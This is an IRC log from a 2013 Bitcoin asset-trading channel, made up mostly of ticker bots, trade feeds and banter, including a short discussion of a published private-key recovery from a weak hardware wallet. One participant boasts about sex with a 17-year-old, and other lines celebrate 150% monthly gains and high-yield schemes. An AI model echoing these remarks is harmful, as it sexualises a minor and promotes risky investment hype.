0.0052797 / 0.0075 (1193791 shares, 6,302.87 BTC), 30D: 0.00085848 / 0.00428374 / 0.0075 (10584536 shares, 45,341.47 BTC) Jan 28 22:51:16 ;;calc 0.0074427/0.0042837 Jan 28 22:51:17 1.7374465999 Jan 28 22:52:09 ;;calc (0.0074427*18.75)/(0.0042837*13.75) Jan 28 22:52:10 2.3692453635 Jan 28 22:52:24 150% monthly gains. this is the stuff legends are made out of. Jan 28 22:52:37 the 10k btc pizza and the 150% a month s.dice investment. Jan 28 22:52:56 if it was on large volume, it'd sound like the beginning of the rothschilds Jan 28 22:53:03 it IS on large volume tho. Jan 28 22:53:16 ;;calc 45341.47 * 15 Jan 28 22:53:17 680122.05 Jan 28 22:53:25 well, for some values of "large" Jan 28 22:53:29 really? something like 400 million dollars? Jan 28 22:53:54 if i recally the story of nathan r. correctly Jan 28 22:53:54 large as in "large number of blowjobs" not as in "large number of private jets" Jan 28 22:55:27 I do prefer to think in terms of % anyway Jan 28 22:56:01 ;;calc 1.07**4.5 Jan 28 22:56:01 1.35589793584 Jan 28 22:56:14 pirate was a pittance by comparison. Jan 28 22:57:17 heh, i'm up 2500% since june 2011 Jan 28 22:57:21 or thereabouts Jan 28 22:58:04 x25 nice Jan 28 22:58:10 crazy Jan 28 22:59:25 what's crazy is mpex Jan 28 23:00:08 http://www.youtube.com/watch?v=NMNgbISmF4I Jan 28 23:00:22 ;;asks 20 Jan 28 23:00:24 There are currently 25617.646 bitcoins offered at or under 20.0 USD, worth 496507.979567 USD in total. Jan 28 23:04:18 ;;asks 22 Jan 28 23:04:20 There are currently 32872.269 bitcoins offered at or under 22.0 USD, worth 648012.998936 USD in total. Jan 28 23:04:23 !ticker h sdice Jan 28 23:04:27 [HAVELOCK:SDICE] 1D: 0.80000000 / 0.80016949 / 0.81000000 (59 shares, 47.21000000 BTC), 7D: 0.44000000 / 0.61008278 / 0.81000000 (1329 shares, 810.80001806 BTC), 30D: 0.37000000 / 0.49998681 / 0.81000000 (5268 shares, 2633.93051794 BTC) Jan 28 23:04:28 !ticker btctc sdice Jan 28 23:04:30 Hell, ain't we about more fucked than a whore at closin' time, huh? Jan 28 23:04:37 !ticker btctc s.dice Jan 28 23:04:39 You had the last Philistine. This one's mine. Jan 28 23:04:43 wtf is it called Jan 28 23:04:49 omg why people can't keep to standards Jan 28 23:04:55 btct.co? Jan 28 23:04:57 that johnniewalker video is wtf Jan 28 23:05:04 !ticker btctc gsdpt Jan 28 23:05:05 [BTCT:GSDPT] 1D: 0.0072 / 0.0074 / 0.0075 (2385 shares, 17.6 BTC), 7D: 0.0046 / 0.01 / 0.0075 (16823 shares, 106.4 BTC), 30D: 0.0042 / 0.01 / 0.0075 (27927 shares, 159.5 BTC) Jan 28 23:05:07 [MPEX] [S.MPOE] 2850 @ 0.00065149 = 1.8567 BTC [-] Jan 28 23:05:30 !ticker hf sdice Jan 28 23:05:31 Have you got any tobacco? Jan 28 23:05:39 !ticker bf sdice Jan 28 23:05:40 Aren't those tins of tobacco right there behind you? Jan 28 23:05:46 Ukto what;'s it called on yoru thing ? Jan 28 23:06:17 !help my ass Jan 28 23:06:18 List of commands: Jan 28 23:06:19 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Jan 28 23:06:29 o, stuill no bitfunder ? Jan 28 23:08:49 sry, Ukto had to code MPBPT stuff like deissuing shares/freezing assets Jan 28 23:09:23 when he finishes "nuke the asset" button i'll release him Jan 28 23:09:49 whats mpbpt Jan 28 23:10:14 https://bitfunder.com/asset/CoinBr.MPBPT-E Jan 28 23:10:37 i suspect i'm quite a headache for him with that monthly revolving Jan 28 23:11:14 o o Jan 28 23:14:38 [BTCTC] [B.YABMC] 2 @ 0.0261 = 0.0522 BTC [+] Jan 28 23:14:39 ;;asks 19 Jan 28 23:14:41 There are currently 7831.5312 bitcoins offered at or under 19.0 USD, worth 148281.124239 USD in total. Jan 28 23:17:27 ;;calc -19/(.198-1) Jan 28 23:17:27 23.6907730673 Jan 28 23:20:13 ;;calc -18/(.31-1) Jan 28 23:20:13 26.0869565217 Jan 28 23:21:07 [BTCTC] [BTC-BOND] 8 @ 0.0099 = 0.0792 BTC [+] Jan 28 23:27:00 ;;calc -19/(.17-1) Jan 28 23:27:00 22.8915662651 Jan 28 23:28:27 [MPEX] [S.DICE] 1249 @ 0.007395 = 9.2364 BTC [-] Jan 28 23:30:24 ;;ticker Jan 28 23:30:25 BTCUSD ticker | Best bid: 18.75212, Best ask: 18.79998, Bid-ask spread: 0.04786, Last trade: 18.75215, 24 hour volume: 52294.18354101, 24 hour low: 17.75000, 24 hour high: 18.80000, 24 hour vwap: 18.25176 Jan 28 23:30:35 we're breaking 19 aren't we. Jan 28 23:30:51 :D Jan 28 23:38:17 [MPEX] [S.MPOE] 20039 @ 0.00066591 = 13.3442 BTC [+] Jan 28 23:40:41 Diablo-D3 since you're getting teh asic, care to buy some X.IDIFF.MAR ? Jan 28 23:40:52 nope. Jan 28 23:40:59 why? Jan 28 23:41:05 I dont play those games Jan 28 23:46:06 ;;asks 18 Jan 28 23:46:08 There are currently 0 bitcoins offered at or under 18.0 USD, worth 0.0 USD in total. Jan 28 23:46:15 ;;bids 18 Jan 28 23:46:16 There are currently 11782.413 bitcoins demanded at or over 18.0 USD, worth 214619.864681 USD in total. Jan 28 23:48:29 [MPEX] [S.DICE] 642 @ 0.007395 = 4.7476 BTC [-] Jan 28 23:54:27 [BTCTC] [GSDPT] 40 @ 0.0074 = 0.296 BTC [-] Jan 28 23:56:21 ;;asks 19.2 Jan 28 23:56:23 There are currently 11396.816 bitcoins offered at or under 19.2 USD, worth 216605.517169 USD in total. Jan 28 23:58:10 [MPEX] [S.MPOE] 1000 @ 0.0006537 = 0.6537 BTC [-] Jan 28 23:58:12 [MPEX] [S.MPOE] 11550 @ 0.00065369 = 7.5501 BTC [-] Jan 29 00:03:09 another gem: www.btchyip.com 0.30 % daily Jan 29 00:03:27 ;;calc 1.003**30 Jan 29 00:03:27 1.09402687487 Jan 29 00:05:14 lol. Jan 29 00:05:28 srsly, less than mpoe bnonds ?! Jan 29 00:08:38 ;;ticker Jan 29 00:08:39 BTCUSD ticker | Best bid: 18.78001, Best ask: 18.81997, Bid-ask spread: 0.03996, Last trade: 18.78001, 24 hour volume: 52827.67385708, 24 hour low: 17.75000, 24 hour high: 18.85000, 24 hour vwap: 18.26568 Jan 29 00:18:22 ;;asks 19 Jan 29 00:18:24 There are currently 6900.5812 bitcoins offered at or under 19.0 USD, worth 130674.028466 USD in total. Jan 29 00:18:38 crap, i left my IRC on at work, I'm not gonna get banned or booted am i? Jan 29 00:18:56 why would you? Jan 29 00:19:06 and why don't you ghost it Jan 29 00:19:15 i have no idea, haven't used IRC in 7 years, just got back in for bitcoin Jan 29 00:19:40 bitcoin-bots banned me for somereason. only connected once, didn't say anything. weird. Jan 29 00:19:45 /msg nickserv help ghost Jan 29 00:19:51 DeadWeasel_: ^^ Jan 29 00:20:48 :) Jan 29 00:20:49 wow, thanks. Jan 29 00:20:58 i'll rtfm next time. Jan 29 00:21:50 always a wise choice to rtfm :D Jan 29 00:22:12 too many fm! Jan 29 00:22:22 slow and steady I guess Jan 29 00:28:56 this btc tabloid is hilarious: "GLBSE went from being a scam-ridden backwater to the home of hundreds of thousands of dollars' worth of investment funds." Jan 29 00:30:21 What does a proper buy order look like? Jan 29 00:30:47 jurov can they name one of them funds ?! Jan 29 00:30:58 jborkl BUY|S.DICE|100|100 for instance Jan 29 00:31:04 thank you Jan 29 00:33:07 just make sure you dont swap the positions of # of shares and price of shares... Jan 29 00:33:08 heheh Jan 29 00:33:44 1000 bidwall at 18.75 now Jan 29 00:33:46 yesss Jan 29 00:33:47 jborkl, if you use pympex, -h shows an example ,too. with proper quotes. Jan 29 00:33:50 [MPEX] [S.DICE] 5900 @ 0.007395 = 43.6305 BTC [-] Jan 29 00:33:57 looks like it worked! Jan 29 00:34:03 ;;ticker Jan 29 00:34:05 BTCUSD ticker | Best bid: 18.80999, Best ask: 18.81000, Bid-ask spread: 0.00001, Last trade: 18.80999, 24 hour volume: 53584.25565676, 24 hour low: 17.75000, 24 hour high: 18.85000, 24 hour vwap: 18.27732 Jan 29 00:34:10 teh sweet. Jan 29 00:34:27 Please go to 50 Jan 29 00:34:33 I have so many calls Jan 29 00:35:02 lolz Jan 29 00:35:09 i think 50 may be a little much. Jan 29 00:35:10 like Jan 29 00:35:12 yes 50 Jan 29 00:35:16 then, 1 Jan 29 00:35:17 yes 50! Jan 29 00:35:19 why not! Jan 29 00:35:38 because bitcoin Jan 29 00:35:52 32 would be ok. cause bitbet :P Jan 29 00:35:58 lol Jan 29 00:36:16 [MPEX] [S.MPOE] 6970 @ 0.00065766 = 4.5839 BTC [+] Jan 29 00:36:44 I would be ok with 37, because Tesla model S Jan 29 00:36:51 lol Jan 29 00:36:56 what if 17 bugsy Jan 29 00:37:00 BITCAR Jan 29 00:37:03 uhhh Jan 29 00:37:05 17? Jan 29 00:37:10 uhhh Jan 29 00:37:56 then I'm back to Jan 14th 2013 Jan 29 00:37:59 17 is a good number. Jan 29 00:38:05 prime Jan 29 00:38:07 im fucking a 17yo chick, she's juicy... Jan 29 00:38:14 37 is a little stringy. Jan 29 00:39:41 There has not been a single big dump in this rally Jan 29 00:39:46 not even a 5k one Jan 29 00:41:45 i haven't really been watching Jan 29 00:41:49 [MPEX] [S.BBET] 4000 @ 0.00139 = 5.56 BTC [-] Jan 29 00:42:33 just look at clark moody Jan 29 00:42:37 all the tall bars are green Jan 29 00:42:44 they're waiting for 19.16 again Jan 29 00:42:55 or not Jan 29 00:43:00 i have no idear Jan 29 00:43:02 [MPEX] [S.MPOE] 3719 @ 0.00065766 = 2.4458 BTC [+] Jan 29 00:43:11 just another redneck on the interwebz Jan 29 00:43:15 last be drop was Firday night Jan 29 00:43:37 was a weird weekend, no drop. Jan 29 00:43:54 shocked on on sunday morning Jan 29 00:43:58 [MPEX] [S.MPOE] 11650 @ 0.00065393 = 7.6183 BTC [-] Jan 29 00:44:00 that bitbrew guy must be so happy Jan 29 00:44:07 bitbrew ?! Jan 29 00:44:19 I bought like 5 pounds of coffee off him Jan 29 00:44:20 !ticker m s.bbet Jan 29 00:44:21 [MPEX:S.BBET] 1D: 0.001139 / 0.00123697 / 0.0015 (11280 shares, 13.95 BTC), 7D: 0.00100006 / 0.00116432 / 0.0015 (44010 shares, 51.24 BTC), 30D: 0.000337 / 0.00079135 / 0.0035 (2311563 shares, 1,829.26 BTC) Jan 29 00:44:29 at 3BTC / lb Jan 29 00:44:37 not bad Jan 29 00:44:51 it seemed cheap at the time Jan 29 00:46:52 I love m$ Jan 29 00:47:18 my t, v, c, h and possibly other keys don't work in outlook Jan 29 00:49:18 18 letters should be enough for anyone. Jan 29 00:56:06 booyah Jan 29 00:56:21 ;;asks 19 Jan 29 00:56:23 There are currently 6540.5084 bitcoins offered at or under 19.0 USD, worth 123910.430553 USD in total. Jan 29 00:56:41 lag Jan 29 00:57:20 ;;asks 20 Jan 29 00:57:21 There are currently 23987.436 bitcoins offered at or under 20.0 USD, worth 465955.615851 USD in total. Jan 29 00:57:51 [MPEX] [S.DICE] 200 @ 0.00737304 = 1.4746 BTC [-] Jan 29 00:57:53 [MPEX] [S.DICE] 750 @ 0.00737303 = 5.5298 BTC [-] Jan 29 00:58:04 the asks are still lagged Jan 29 00:58:15 ;;bids 17 Jan 29 00:58:17 There are currently 29960.301 bitcoins demanded at or over 17.0 USD, worth 531395.791806 USD in total. Jan 29 00:58:30 should be 5403 below 19 Jan 29 00:58:43 we used to worry about lag because of headshots. now it's sniping for $$$. long live Quake. Jan 29 00:58:48 ;;asks 37 Jan 29 00:58:49 There are currently 53877.097 bitcoins offered at or under 37.0 USD, worth 1290692.2985 USD in total. Jan 29 01:03:20 [BTCTC] [B.YABMC] 168 @ 0.0261 = 4.3848 BTC [+] Jan 29 01:04:04 [BTCTC] [B.YABMC] 100 @ 0.026 = 2.6 BTC [-] Jan 29 01:04:44 I like to see that as the number of asks go down, the number of bids > 18 keeps going up. Organic bidding rather than impatient bidwalls Jan 29 01:06:36 ;;ticker Jan 29 01:06:37 BTCUSD ticker | Best bid: 18.86001, Best ask: 18.87054, Bid-ask spread: 0.01053, Last trade: 18.87054, 24 hour volume: 55495.39610726, 24 hour low: 17.75000, 24 hour high: 18.88000, 24 hour vwap: 18.30617 Jan 29 01:14:47 [BTCTC] [RSM] 72 @ 0.0089 = 0.6408 BTC [+] Jan 29 01:16:35 [BTCTC] [RSM] 40 @ 0.009 = 0.36 BTC [+] Jan 29 01:17:02 how many of you are self-taught traders? you know, without an education in finance, etc? Jan 29 01:17:35 my degrees are in philosophy&anthropology Jan 29 01:18:38 neuroscience Jan 29 01:19:04 I think losing money trading is the best education for finance. Jan 29 01:19:56 "value of engineer tracks total value of broken equipment" Jan 29 01:20:58 btw Bugpowder_ saw quite a scene today sitting in the cab waiting for girls to drag in the shopping Jan 29 01:21:13 tabby cat running down the street chased by bigger black cat Jan 29 01:21:25 which caught up with it, went on top of it and snapped it's neck Jan 29 01:21:36 tabby went into tremors, peed and died. Jan 29 01:22:03 hoo my Jan 29 01:22:16 r u scarred 4 lyfe? Jan 29 01:22:28 that dude was like a fucking assasin, took like .3 seconds flat to do it too Jan 29 01:22:39 no, but [one of] the girls were Jan 29 01:22:44 jesus christ. cats are learning kung fu. Jan 29 01:23:01 driver thought someone hit the cat with a car Jan 29 01:23:21 but it was just ninja cat. Jan 29 01:23:28 for srs. Jan 29 01:23:38 Bugpowder_: are phf Jan 29 01:23:43 damn. tabby walked down the wrong alley. Jan 29 01:23:44 phd* Jan 29 01:23:50 nice. Jan 29 01:24:07 better not be hittin' on that cat's bitchez or else he waits on a tree branch above your doorway Jan 29 01:24:38 so your technology skills are self-taught I assume? Jan 29 01:24:38 yea Jan 29 01:24:38 shit Jan 29 01:24:43 just got reviews for paper back Jan 29 01:24:49 FLUNKED Jan 29 01:24:51 !! Jan 29 01:25:04 ouch Jan 29 01:25:16 [BTCTC] [B.YABMC] 1 @ 0.0324 BTC [+] Jan 29 01:26:16 i'm asking these questions, trying to motivate myself to learn to trade some bitcoin assets. i believe in this as crucial piece of the freedom triangle that is humanities future. also, I guess I'm greedy. I want more than I have. Jan 29 01:26:42 Its not that bad actually Jan 29 01:27:19 it doesn't seem so, just kinda scary. If I did so, I'd have to wager at least half my savings. as you can guess by the requirements, that is very small. Jan 29 01:27:48 but I bet on gold, made 2x, selling that, want to go all BTC. all in. Jan 29 01:28:30 DeadWeasel_ why'd you have to wager half your savings ?! Jan 29 01:29:03 because my saving is awfully small. i've no debt, but not a big cushion either. long story Jan 29 01:29:16 not for 94+ IRC people Jan 29 01:29:33 it's bitcoin dood, it has 8 decimals Jan 29 01:29:35 you can trade on one cent Jan 29 01:31:29 post registration, anyhow. Jan 29 01:31:31 i can kick a few so we are under 94. Jan 29 01:31:34 or passthrough Jan 29 01:31:54 but third party is.... too many parties. Jan 29 01:32:00 o, you mean mpex reg ? Jan 29 01:32:09 yeah. Jan 29 01:32:31 well at any rate why do anything scary ? Jan 29 01:32:37 relax, enjoy it. Jan 29 01:32:59 I am enjoying it. just watching BTC go up and up and up, then way down, then up, the down again, then up alittle. then way up. Jan 29 01:33:21 < kakobrekla> i can kick a few so we are under 94. << lol, such a gossip Jan 29 01:33:46 ;;ticker Jan 29 01:33:46 BTCUSD ticker | Best bid: 18.75000, Best ask: 18.75960, Bid-ask spread: 0.00960, Last trade: 18.75960, 24 hour volume: 56923.28708903, 24 hour low: 17.75000, 24 hour high: 18.88000, 24 hour vwap: 18.32505 Jan 29 01:36:07 The rally is over ;( Jan 29 01:36:25 nothing lasts forever Jan 29 01:36:30 perhaps with the exception of a good orgasm Jan 29 01:37:43 [MPEX] [S.DICE] 500 @ 0.007395 = 3.6975 BTC [+] Jan 29 01:40:08 1867 bid @ 18.7 && 1128 asked @ 18.9 Jan 29 01:40:32 wences Jan 29 01:40:56 now only 600 @ 18.9 Jan 29 01:41:09 winces you mean ? Jan 29 01:41:19 it's like just reading the name draws a wince out of me Jan 29 01:41:24 haha Jan 29 01:41:30 you rounded an mpex deposit? Jan 29 01:41:34 i think it may still have some legs... Jan 29 01:41:59 haha dub Jan 29 01:42:00 why round any bitcoin amount? Jan 29 01:42:26 srsly. Jan 29 01:42:35 round rump good, round bitcoin bad Jan 29 01:42:44 the rrg-rbb rule. Jan 29 01:42:47 i round everything to 21mil Jan 29 01:43:14 i'm considering switching to gnucash from pen and paper, but it only goes to 6 decimals. /me tests using satoshi for everthing Jan 29 01:43:26 bah, it forces commas at intervals of 3 Jan 29 01:43:32 i want at intervals of 4! Jan 29 01:43:59 seporators are no matter! Jan 29 01:44:03 ;) Jan 29 01:44:21 they bother me when they are there, more than when they arn't Jan 29 01:45:02 mpex forced me to learn sat. nat. Jan 29 01:45:48 wth is sat. nat.? Jan 29 01:46:01 err, satoshi notation Jan 29 01:46:11 gnucash is pretty good Jan 29 01:46:31 lol, i was googling sat. nat.... hopeless Jan 29 01:46:37 sorry. Jan 29 01:46:38 :/ Jan 29 01:47:24 iz: i've only found issues with securities as liabilities and that it doesn't directly or easily support bitcoin Jan 29 01:48:13 for somereason, if i tell it that I have S.DICE on account for THATGUY, it thinks I sold the S.DICE Jan 29 01:48:16 @.@ Jan 29 01:49:05 mod6: did you learn your sat.nat. with commas every 3 places? Jan 29 01:49:17 i didn't, and having them there is annoying Jan 29 01:50:26 well, i personally wasn't used to the idea of 2500 sat. as 0.00002500 -- but yeah, i can do without the seperators Jan 29 01:50:57 mpex forced me to strictly examine every order's sat value closely Jan 29 01:51:04 smickles: ah yeah... well, you could get someone to patch it or contrib to it Jan 29 01:51:18 but im better for this nao :) Jan 29 01:51:25 iz: i think there are patches out there already Jan 29 01:51:50 but, it would be easier to stay with my distro's package manager Jan 29 01:55:07 omg bitcoin broken, panic sell Jan 29 01:55:08 http://www.nilsschneider.net/2013/01/28/recovering-bitcoin-private-keys.html Jan 29 01:55:23 hax Jan 29 01:56:42 lol, nice Jan 29 01:57:44 dang Jan 29 01:57:59 ;;asks 19 Jan 29 01:58:01 There are currently 4983.2012 bitcoins offered at or under 19.0 USD, worth 94441.1376911 USD in total. Jan 29 01:58:06 ooooo yaaaa Jan 29 01:58:11 lol, don't use the same random number over and over again Jan 29 01:58:35 http://imgs.xkcd.com/comics/random_number.png Jan 29 01:58:48 :) Jan 29 01:59:45 kakobrekla: http://digitaloffense.net/tools/debian-openssl/pmeo9hcjp7aw9.jpg Jan 29 02:00:27 smickles why not simply use satoshi as unit ? Jan 29 02:00:31 :) Jan 29 02:00:41 mircea_popescu: the forced commas are annoying Jan 29 02:01:07 yeah, ` much nicer. Jan 29 02:01:21 2205644893 is mangled into 2,205,644,893 Jan 29 02:01:43 22,0564,4893 would be much nicer Jan 29 02:01:44 gnoobs. Jan 29 02:02:10 [MPEX] [S.MPOE] 1900 @ 0.00065393 = 1.2425 BTC [-] Jan 29 02:02:55 dub ouch that actually is an issue Jan 29 02:04:22 mircea_popescu: is that not the reason the dev teams always says to use a unique addy for every tx? Jan 29 02:04:32 not afaik Jan 29 02:04:49 this is unrelated, the problem is same random number used with diff transactions Jan 29 02:05:36 something that normally does not happen Jan 29 02:05:44 and according to spec it should not? Jan 29 02:06:10 the page says it was a hardware bitcoin wallet Jan 29 02:06:13 yeah Jan 29 02:06:24 so i assume it was some custom btc client, not the official client Jan 29 02:06:41 afaik the recomendation for ew addy each time is anonimity and some vague "maybe someone cracks the digest" Jan 29 02:06:53 yes, they're talkign about it in -dev and its come up elsewhere in broken implementations Jan 29 02:06:56 iz it wouldn't surprise me if it were an old client. who knows Jan 29 02:07:00 yeah Jan 29 02:07:40 lianj: These are from a hardware wallet called bitcoincard(.org) with little entropy. Jan 29 02:07:55 [MPEX] [S.MPOE] 10138 @ 0.00065393 = 6.6295 BTC [-] Jan 29 02:07:56 (tcatm is the author) Jan 29 02:08:15 tcatm = niels ?! Jan 29 02:09:15 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Jan 29 02:09:57 yes Jan 29 02:10:30 had no idea. Jan 29 02:18:14 hrmf, this channel used to be cool, edgy and underground Jan 29 02:18:19 now its all mainstream Jan 29 02:18:28 fu dub Jan 29 02:18:33 [MPEX] [S.MPOE] 5300 @ 0.00065602 = 3.4769 BTC [+] Jan 29 02:19:07 you;re the only mainstream guy here Jan 29 02:19:15 I may have mentioned the channel publicly Jan 29 02:19:47 well it's in my faq Jan 29 02:19:56 mentioned the channel at an indie rock concert you rode your fixie bike to Jan 29 02:19:57 dub let's leave. you go first Jan 29 02:20:01 yes but only 7 people have read that Jan 29 02:21:04 back when glbse was still going my customers used to read my faq ;/ Jan 29 02:22:06 anyways, im off. prop the btc up! **** BEGIN LOGGING AT Tue Jan 29 09:29:26 2013 Jan 29 09:31:50 [MPEX] [S.MPOE] 2500 @ 0.00066274 = 1.6569 BTC [+] Jan 29 09:32:04 ;;ticker Jan 29 09:32:05 BTCUSD ticker | Best bid: 19.13001, Best ask: 19.19999, Bid-ask spread: 0.06998, Last trade: 19.13001, 24 hour volume: 76946.58851986, 24 hour low: 17.86173, 24 hour high: 19.30000, 24 hour vwap: 18.58421 Jan 29 09:35:59 o hey 19s Jan 29 09:37:53 Bugpowder https://bitcointalk.org/index.php?topic=139649.0 Jan 29 09:38:44 and in more serious news, http://www.zerohedge.com/news/2013-01-28/labor-minister-says-france-totally-bankrupt Jan 29 09:39:12 [MPEX] [S.DICE] 300 @ 0.007395 = 2.2185 BTC [+] Jan 29 09:41:02 [MPEX] [S.MPOE] 5465 @ 0.00066274 = 3.6219 BTC [+] Jan 29 09:41:04 [MPEX] [S.MPOE] 2850 @ 0.00066546 = 1.8966 BTC [+] Jan 29 09:41:05 [MPEX] [S.MPOE] 2400 @ 0.00066572 = 1.5977 BTC [+] Jan 29 09:41:07 [MPEX] [S.MPOE] 579 @ 0.00066599 = 0.3856 BTC [+] Jan 29 09:45:56 hey mircea_popescu, you can ignore my deposit for 112, im dyslexic or need coffee.. it should have been 121 which i did a few seconds later, and sent it properly. :) Jan 29 09:50:00 [MPEX] [S.MPOE] 7150 @ 0.00065556 = 4.6873 BTC [-] Jan 29 09:50:01 [MPEX] [S.MPOE] 6999 @ 0.00064828 = 4.5373 BTC [-] Jan 29 10:01:34 [BTCTC] [ESECURITYSABTC] 1 @ 0.7101 BTC [+] Jan 29 10:01:36 [BTCTC] [ESECURITYSABTC] 1 @ 0.71 BTC [-] Jan 29 10:01:37 [BTCTC] [ESECURITYSABTC] 41 @ 0.7011 = 28.7451 BTC [-] Jan 29 10:07:32 [MPEX] [S.DICE] 61 @ 0.00728138 = 0.4442 BTC [-] Jan 29 10:17:50 [MPEX] [S.MPOE] 1955 @ 0.00064828 = 1.2674 BTC [-] Jan 29 10:19:29 topace no biggy Jan 29 10:19:33 i'll just ignore both :D Jan 29 10:19:42 lol, thats no good :p Jan 29 10:19:59 hehe. o waity, you were trading 8s yest huh Jan 29 10:20:27 yea havelock sdice passthru hit 0.80 Jan 29 10:20:31 !ticker h sdice Jan 29 10:20:33 [HAVELOCK:SDICE] 1D: 0.74000000 / 0.773125 / 0.80000000 (184 shares, 142.25500030 BTC), 7D: 0.44000000 / 0.62780101 / 0.81000000 (1408 shares, 883.94381836 BTC), 30D: 0.37000000 / 0.50651342 / 0.81000000 (5402 shares, 2736.18551824 BTC) Jan 29 10:20:40 0.81 even :p Jan 29 10:22:14 deposit queue flushed ftr. Jan 29 10:22:37 whoop thx Jan 29 10:23:00 i should go home, its 3.22am Jan 29 10:23:04 and im still at the office Jan 29 10:23:10 and i have to be back for a server delivery at 9am Jan 29 10:23:11 :( Jan 29 10:23:21 becauase if im not here at 9am, thats when purolator will come Jan 29 10:23:28 if i am here, they'll be here around 2 in the afternoon Jan 29 10:24:24 lol Jan 29 10:24:50 you need either a. install a bed or b. chain a girly to the coatrack Jan 29 10:25:16 lol yea Jan 29 10:25:33 soon as i get the mining equipment out of my boardroom, i could sleep on the couch Jan 29 10:25:47 but that rooms too cold now to sleep there... (the window is open, to keep the mining equipment cool) Jan 29 10:26:00 and its -15C outside Jan 29 10:26:17 lol Jan 29 10:26:18 and it has a 3200 CFM fan blowing air in :p Jan 29 10:26:20 i never got into mining Jan 29 10:26:41 cheap cooling in canada in the winter months :) Jan 29 10:26:46 i bet Jan 29 10:26:51 melting the ice caps Jan 29 10:27:19 k im out Jan 29 10:27:20 ttyl **** BEGIN LOGGING AT Tue Jan 29 10:56:23 2013 Jan 29 11:00:18 [MPEX] [S.MPOE] 12700 @ 0.0006498 = 8.2525 BTC [+] Jan 29 11:00:20 [MPEX] [S.MPOE] 12082 @ 0.00064501 = 7.793 BTC [-] Jan 29 11:00:21 [MPEX] [S.MPOE] 20554 @ 0.00064437 = 13.2444 BTC [-] Jan 29 11:00:23 [MPEX] [S.MPOE] 4514 @ 0.00064421 = 2.908 BTC [-] Jan 29 11:01:37 [MPEX] [S.DICE] 100 @ 0.00727383 = 0.7274 BTC [-] Jan 29 11:11:55 [MPEX] [S.DICE] 450 @ 0.00725575 = 3.2651 BTC [-] Jan 29 11:19:33 [MPEX] [S.MPOE] 2550 @ 0.00064989 = 1.6572 BTC [+] Jan 29 11:22:13 ffs Jan 29 11:22:41 [MPEX] [S.MPOE] 11634 @ 0.00064421 = 7.4947 BTC [-] Jan 29 11:27:13 [MPEX] [S.DICE] 300 @ 0.00722215 = 2.1666 BTC [-] Jan 29 11:46:52 still going up huh Jan 29 11:52:13 [MPEX] [O.BTCUSD.C160T] 1 @ 0.19941025 BTC [-] Jan 29 11:53:15 [MPEX] [S.DICE] 900 @ 0.00720244 = 6.4822 BTC [-] Jan 29 11:53:43 [MPEX] [O.BTCUSD.P160T] 1 @ 0.08536952 BTC [-] Jan 29 12:08:38 [MPEX] [S.DICE] 250 @ 0.00722215 = 1.8055 BTC [+] Jan 29 12:18:14 [BTCTC] [GSDPT] 760 @ 0.0074 = 5.624 BTC [-] Jan 29 12:23:51 [MPEX] [S.MPOE] 2400 @ 0.00064989 = 1.5597 BTC [+] Jan 29 12:28:46 [MPEX] [S.MPOE] 22455 @ 0.00064989 = 14.5933 BTC [+] Jan 29 12:44:18 [MPEX] [S.MPOE] 4953 @ 0.00064989 = 3.2189 BTC [+] Jan 29 12:54:28 [MPEX] [S.MPOE] 5850 @ 0.00064989 = 3.8019 BTC [+] Jan 29 12:56:42 [MPEX] [S.MPOE] 9600 @ 0.00064989 = 6.2389 BTC [+] Jan 29 13:01:53 [MPEX] [S.DICE] 100 @ 0.00720244 = 0.7202 BTC [-] Jan 29 13:01:55 [MPEX] [S.DICE] 550 @ 0.00717887 = 3.9484 BTC [-] Jan 29 13:01:56 [MPEX] [S.DICE] 200 @ 0.0071638 = 1.4328 BTC [-] Jan 29 13:20:02 ;;bids 19 Jan 29 13:20:04 There are currently 1957.6893 bitcoins demanded at or over 19.0 USD, worth 37414.8275541 USD in total. Jan 29 13:21:04 ;;asks 32 Jan 29 13:21:05 There are currently 43682.557 bitcoins offered at or under 32.0 USD, worth 1057083.08203 USD in total. Jan 29 13:21:44 [MPEX] [S.MPOE] 2492 @ 0.00064989 = 1.6195 BTC [+] Jan 29 13:21:46 [MPEX] [S.MPOE] 6352 @ 0.00065585 = 4.166 BTC [+] Jan 29 13:21:47 [MPEX] [S.MPOE] 4300 @ 0.00066255 = 2.849 BTC [+] Jan 29 13:21:49 [MPEX] [S.MPOE] 8500 @ 0.00066503 = 5.6528 BTC [+] Jan 29 13:21:50 [MPEX] [S.MPOE] 421 @ 0.00066599 = 0.2804 BTC [+] Jan 29 13:21:50 [MPEX] [S.MPOE] 3051 @ 0.00066703 = 2.0351 BTC [+] Jan 29 13:22:55 [MPEX] [S.DICE] 300 @ 0.00722215 = 2.1666 BTC [+] Jan 29 13:23:40 [MPEX] [S.DICE] 550 @ 0.00714694 = 3.9308 BTC [-] Jan 29 13:24:15 ;;ticker Jan 29 13:24:19 BTCUSD ticker | Best bid: 19.27520, Best ask: 19.31625, Bid-ask spread: 0.04105, Last trade: 19.35000, 24 hour volume: 82461.46947858, 24 hour low: 17.90100, 24 hour high: 19.78000, 24 hour vwap: 18.75037 Jan 29 13:27:28 /nick deadweasel Jan 29 13:38:19 [MPEX] [S.MPOE] 4950 @ 0.00064702 = 3.2027 BTC [-] Jan 29 13:53:35 [MPEX] [S.DICE] 100 @ 0.00722215 = 0.7222 BTC [+] Jan 29 13:59:37 [MPEX] [S.DICE] 1289 @ 0.00727383 = 9.376 BTC [+] Jan 29 13:59:39 [MPEX] [S.DICE] 511 @ 0.007395 = 3.7788 BTC [+] Jan 29 14:13:58 [MPEX] [S.MPOE] 4235 @ 0.00064927 = 2.7497 BTC [+] Jan 29 14:14:00 [MPEX] [S.MPOE] 1595 @ 0.00064702 = 1.032 BTC [-] Jan 29 14:22:55 [MPEX] [S.MPOE] 6900 @ 0.00065586 = 4.5254 BTC [+] Jan 29 14:29:12 [MPEX] [S.MPOE] 4000 @ 0.00066507 = 2.6603 BTC [+] Jan 29 14:29:14 [MPEX] [S.MPOE] 1500 @ 0.00064702 = 0.9705 BTC [-] Jan 29 14:36:02 [MPEX] [S.MPOE] 13627 @ 0.00066541 = 9.0675 BTC [+] Jan 29 14:40:39 [MPEX] [S.MPOE] 6400 @ 0.00066541 = 4.2586 BTC [+] Jan 29 14:41:22 o o, seems we going down Jan 29 14:41:23 ;;ticker Jan 29 14:41:24 BTCUSD ticker | Best bid: 18.77100, Best ask: 18.89974, Bid-ask spread: 0.12874, Last trade: 18.89974, 24 hour volume: 92919.30661248, 24 hour low: 17.90100, 24 hour high: 19.78000, 24 hour vwap: 18.78229 